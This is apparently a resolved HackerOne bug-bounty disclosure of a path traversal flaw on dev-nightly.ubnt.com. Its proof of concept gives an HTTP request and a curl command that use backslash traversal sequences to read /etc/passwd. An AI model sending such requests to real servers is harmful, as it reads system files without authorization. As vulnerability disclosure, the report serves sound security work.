[dev-nightly.ubnt.com] Local File Reading

Disclosed: 2017-09-14 18:23:06 By bobrov To ui
High
Vulnerability Details
**Description** Reading files outside the web root via path traversal **PoC** ```http GET /..\..\..\..\..\..\..\..\..\..\..\..\..\..\etc\passwd HTTP/1.1 Host: dev-nightly.ubnt.com ``` ``` curl "https://dev-nightly.ubnt.com/..\..\..\etc\passwd" ``` **Result** {F213057}
Actions
View on HackerOne
Report Stats
  • Report ID: 260420
  • State: Closed
  • Substate: resolved
  • Upvotes: 31
Share this report